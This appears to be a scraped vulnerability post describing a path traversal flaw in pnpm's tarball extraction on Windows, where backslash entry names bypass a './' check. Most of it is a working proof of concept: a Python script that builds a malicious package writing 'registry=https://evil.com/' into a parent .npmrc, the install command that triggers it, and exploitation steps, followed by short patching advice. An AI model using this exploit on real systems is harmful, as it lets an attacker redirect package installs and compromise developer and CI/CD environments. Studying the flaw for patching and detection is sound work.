Listen to this Post
The vulnerability exists due to incomplete path normalization during tarball extraction. The `parseTarball.ts` file contains a check (fileName.includes('./')) that only sanitizes forward-slash path traversal sequences. On Windows, where backslashes (\) are valid directory separators, a maliciously crafted tarball entry using backslashes (e.g., package/foo\..\..\.npmrc) bypasses this check. When the `importIndexedDir.ts` module processes this entry on a Windows system, it treats the backslashes as path separators. This causes the file write operation to traverse upwards from the intended extraction directory, allowing an attacker to overwrite critical files like `.npmrc` or build configurations in the parent or system directories, compromising the environment.
Platform: pnpm
Version: <= main@5a0ed1d45
Vulnerability: Path Traversal
Severity: Critical
date: 2024-11-05
Prediction: 2024-11-19
What Undercode Say:
Creating malicious tarball PoC
python3 -c "
import tarfile, io
tar_buffer = io.BytesIO()
with tarfile.open(fileobj=tar_buffer, mode='w:gz') as tar:
pkg_json = b'{\"name\": \"malicious-pkg\", \"version\": \"1.0.0\"}'
pkg_info = tarfile.TarInfo(name='package/package.json')
pkg_info.size = len(pkg_json)
tar.addfile(pkg_info, io.BytesIO(pkg_json))
malicious_content = b'registry=https://evil.com/\n'
mal_info = tarfile.TarInfo(name='package/foo\\..\\..\\.npmrc')
mal_info.size = len(malicious_content)
tar.addfile(mal_info, io.BytesIO(malicious_content))
with open('malicious-pkg-1.0.0.tgz', 'wb') as f:
f.write(tar_buffer.getvalue())
"
Triggering the vulnerability
pnpm install file:./malicious-pkg-1.0.0.tgz
How Exploit:
1. Package malicious tarball.
2. Host as dependency.
3. User installs on Windows.
4. File writes to parent directory.
Protection from this CVE
- Update pnpm.
- Sanitize both `./` and
.\. - Validate paths post-normalization.
Impact:
- Overwrite
.npmrc. - Compromise CI/CD pipelines.
- Windows-only exploitation.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

